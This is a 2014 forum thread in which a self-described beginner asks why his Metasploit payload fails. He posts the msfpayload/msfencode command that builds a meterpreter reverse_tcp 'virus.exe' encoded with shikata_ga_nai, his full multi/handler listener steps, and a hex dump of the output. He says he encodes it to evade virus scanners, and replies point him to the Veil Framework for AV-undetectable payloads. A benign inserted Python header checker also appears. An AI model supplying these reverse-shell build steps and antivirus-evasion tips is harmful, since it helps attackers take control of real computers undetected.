IAMGiGaByTeX86 Posted June 24, 2014

Hey guys,

So I have a little problem which I do not know how to solve. The problem is that when I encode my payload with x86/shikata_ga_nai and I try it on my Windows PC, it says it cannot run on the OS. This is what I typed:

msfpayload windows/meterpreter/reverse_tcp LHOST=HOSTIP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe

Did I do something wrong? I tested it on Win 8, Win 7 and Win XP and it says cannot open on every system :(

Does someone know the solution?

Thank you,

Mr-Protocol Posted June 24, 2014

Not sure what is wrong with that code. It's been like 4 years since I've played with that kind of stuff.

What do the first 10 bytes of hex look like on your output file? Does it match the signature for an executable header?

msfvenom is a framework that combines msfpayload and msfencode.

Info:
http://www.offensive-security.com/metasploit-unleashed/Msfvenom
http://www.offensive-security.com/metasploit-unleashed/Exploit_Development

IAMGiGaByTeX86 (Author) Posted June 25, 2014

Thanks for your reply, and yeah, I started all the hacking stuff like 3 weeks ago, but I think it's a lot of fun and I really want to get better at it :D

I ran od -t x1 FILENAME on my virus.exe and this was the outcome. I paste my hex in here.

0000000 be 88 90 6f 3c da c3 d9 74 24 f4 5a 29 c9 b1 49
0000020 31 72 14 83 c2 04 03 72 10 6a 65 93 d4 e3 86 6c
0000040 25 93 0f 89 14 81 74 d9 05 15 fe 8f a5 de 52 24
0000060 3d 92 7a 4b f6 18 5d 62 07 ad 61 28 cb ac 1d 33
0000100 18 0e 1f fc 6d 4f 58 e1 9e 1d 31 6d 0c b1 36 33
0000120 8d b0 98 3f ad ca 9d 80 5a 60 9f d0 f3 ff d7 c8
0000140 78 a7 c7 e9 ad b4 34 a3 da 0e ce 32 0b 5f 2f 05
0000160 73 33 0e a9 7e 4a 56 0e 61 39 ac 6c 1c 39 77 0e
0000200 fa cc 6a a8 89 76 4f 48 5d e0 04 46 2a 67 42 4b
0000220 ad a4 f8 77 26 4b 2f fe 7c 6f eb 5a 26 0e aa 06
0000240 89 2f ac ef 76 95 a6 02 62 af e4 4a 47 9d 16 8b
0000260 cf 96 65 b9 50 0c e2 f1 19 8a f5 f6 33 6a 69 09
0000300 bc 8a a3 ce e8 da db e7 90 b1 1b 07 45 15 4c a7
0000320 36 d5 3c 07 e7 bd 56 88 d8 dd 58 42 71 77 a2 05
0000340 21 e7 d3 2b b5 e5 2b c5 1a 60 cd 8f b2 24 45 38
0000360 2a 6d 1d d9 b3 b8 5b d9 38 4e 9b 94 c8 3b 8f 41
0000400 39 76 ed c4 46 ad 98 e8 d2 49 0b be 4a 53 6a 88
0000420 d4 ac 59 82 dd 38 22 fd 21 ac a2 fd 77 ex,a6 a2 95
0000440 2f 92 f0 80 2f 0f 65 19 ba af dc cd 6d c7 e2 28
0000460 59 48 1c 1f 5b b5 cb 66 d9 cf 79 8b 21
0000475

That's my hex, is anything wrong?

Edited June 25, 2014 by IAMGiGaByTeX86

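The header question asked earlier in the thread (do the first bytes match an executable signature?) can be checked mechanically. This is an added example, not code from any post here: it parses `od -t x1` output and tests for the MZ and PE signatures. The first dump line is copied from the post above, the minimal PE header is constructed, and the function names are this example's own.

```python
import struct

# First line of the `od -t x1` output posted in the thread (offset column is octal).
POSTED_OD = "0000000 be 88 90 6f 3c da c3 d9 74 24 f4 5a 29 c9 b1 49"

# Constructed sample: the smallest header that passes both signature checks.
CONSTRUCTED_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00"


def parse_od_x1(text):
    """Convert `od -t x1` output to bytes, skipping the offset column."""
    data = bytearray()
    for line in text.strip().splitlines():
        fields = line.split()
        data.extend(int(tok, 16) for tok in fields[1:])
    return bytes(data)


def classify_header(data):
    """Return 'pe', 'mz-only', 'truncated' or 'not-pe' for a file prefix."""
    if data[:2] != b"MZ":
        return "not-pe"          # no DOS/PE executable signature at offset 0
    if len(data) < 0x40:
        return "truncated"       # DOS header is 64 bytes; e_lfanew sits at 0x3C
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 4 > len(data):
        return "truncated"       # PE signature lies beyond the bytes we have
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return "mz-only"         # DOS header without a PE signature
    return "pe"


if __name__ == "__main__":
    print("posted dump:", classify_header(parse_od_x1(POSTED_OD)))
    print("constructed:", classify_header(CONSTRUCTED_PE))
```
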
i8igmac Posted June 25, 2014

This may be a dumb question. Did u set up msf multi/handler?

Can u try to build a payload without piping through the encoder? By default I think shikata is already used by msfpayload.

Also post your multi/handler commands. Try a few payloads.

IAMGiGaByTeX86 (Author) Posted June 25, 2014

> This may be a dumb question. Did u set up msf multi/handler?
> Can u try to build a payload without piping through the encoder? By default I think shikata is already used by msfpayload.
> Also post your multi/handler commands. Try a few payloads.

I will post my entire process of making the payload and exploiting it :D

1. Open terminal
2. msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X > /root/Desktop/virus.exe
3. open 2nd terminal
4. msfconsole
5. use exploit/multi/handler
6. set payload windows/meterpreter/reverse_tcp
7. set LPORT=MYPORT
8. set LHOST=MYLOCALIP
9. exploit

So yes, I use exploit/multi/handler in preparing the exploit in msfconsole.

Also, if I create the payload without encoding it with shikata_ga_nai it works, but then it's getting picked up by virus scanners, so I use shikata to prevent that. Although mubix said shikata is not for avoiding virus scanners and firewalls, I don't know any other way to avoid them other than shikata. If you do, I would be so thankful if you post it here :D

Edited June 25, 2014 by IAMGiGaByTeX86

Guest spazi Posted June 25, 2014

You should look into the Veil Framework.
I haven't tried it out myself, but it's supposed to be awesome. The payloads you create through Veil should not be picked up by any AV.
Check it out :)

IAMGiGaByTeX86 (Author) Posted June 25, 2014

> You should look into the Veil Framework.
> I haven't tried it out myself, but it's supposed to be awesome. The payloads you create through Veil should not be picked up by any AV.
> Check it out :)

Thanks for the tip! I will definitely check it out :D

i8igmac Posted June 26, 2014

These public encoders will be undetectable for how long? Shikata was 100% undetectable for not long. 98%, then 95%, 90%, 80%, 50%, as VirusTotal showed after only a few months after its release.

Why go public with a fantastic tool like shikata? Or even the tool posted above...

factgasm Posted June 26, 2014

It would be interesting to see the encoders listed by their undetectability.